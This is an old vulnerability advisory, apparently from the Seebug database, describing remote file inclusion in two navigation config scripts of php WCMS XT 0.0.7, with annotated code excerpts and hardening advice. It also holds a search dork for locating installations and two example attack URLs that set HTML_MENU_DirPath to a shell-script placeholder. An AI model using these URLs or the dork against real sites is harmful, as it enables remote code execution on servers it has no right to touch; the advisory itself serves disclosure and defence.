php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities

2007-10-03T00:00:00
ID SSV:7333
Type seebug
Reporter Root
Modified 2007-10-03T00:00:00

Description

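No description provided by source. Going by the excerpts quoted below, two navigation configuration scripts (config_HTML_MENU.php and config_PHPLM.php) build their require_once paths by prefixing the variable $HTML_MENU_DirPath, and the advisory reports that this variable can be supplied as a request parameter when either script is requested directly. Where that holds, the requester rather than the application decides which file PHP includes. Whether a remote file can be included also depends on the server's PHP configuration: register_globals (presumably what lets the parameter populate the variable) and URL-aware includes being enabled.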

                                        
                                            
                                                #  php WCMS XT  0_0_7 BETA <=  Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search?hl=tr&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS%3A+php+WCMS+&meta=
#
#Vuln Code
##############################################################################################
#
#ERROR1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php
#

// Excerpt quoted by the advisory from config_HTML_MENU.php.
// Each require_once path is $HTML_MENU_DirPath concatenated with a fixed
// suffix, so whoever sets that variable chooses the file PHP loads.
// No assignment to $HTML_MENU_DirPath is visible in this excerpt; the advisory
// reports it can be set from the query string on a direct request
// (presumably via register_globals - confirm against the full file).
// All three includes share the same prefix and are affected alike; the
// trailing "<<< RFI" is the advisory author's marker, not PHP.
// Hardening: set the directory from a fixed server-side value before these
// lines, refuse direct HTTP requests to include-only scripts, and keep
// register_globals and allow_url_include disabled.
// Detection: web-server log entries requesting this script with an
// HTML_MENU_DirPath parameter.
// Neccessary Classes
   require_once $HTML_MENU_DirPath.'HTML/Menu.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectRenderer.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath
#
#Example1:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#
##############################################################################################
#Vuln Code
##############################################################################################
#
#ERROR2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php
#
   // Excerpt the advisory attributes to config_PHPLM.php.
   // Both include paths are prefixed with $HTML_MENU_DirPath, which is not
   // assigned anywhere in this excerpt, so its value decides which files load.
   // NOTE(review): the variable name is the HTML_MENU one although the file is
   // config_PHPLM.php - confirm the excerpt against the actual file.
   // The trailing "<<< RFI" is the advisory author's marker, not PHP.
   // Hardening: set the directory from a fixed server-side value before
   // including, block direct HTTP access to this script, and keep
   // register_globals and allow_url_include disabled.
   require_once $HTML_MENU_DirPath.'HTML/Menu.php';
   require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI
#
#
#BUG2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath
#
#Example2:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]]
#

##############################################################################################
#download:
#
#http://sourceforge.net/project/showfiles.php?group_id=160753&package_id=191865&release_id=419910
#
##############################################################################################
#
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
#"HAYIRLI RAMAZANLAR...  ;)"
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################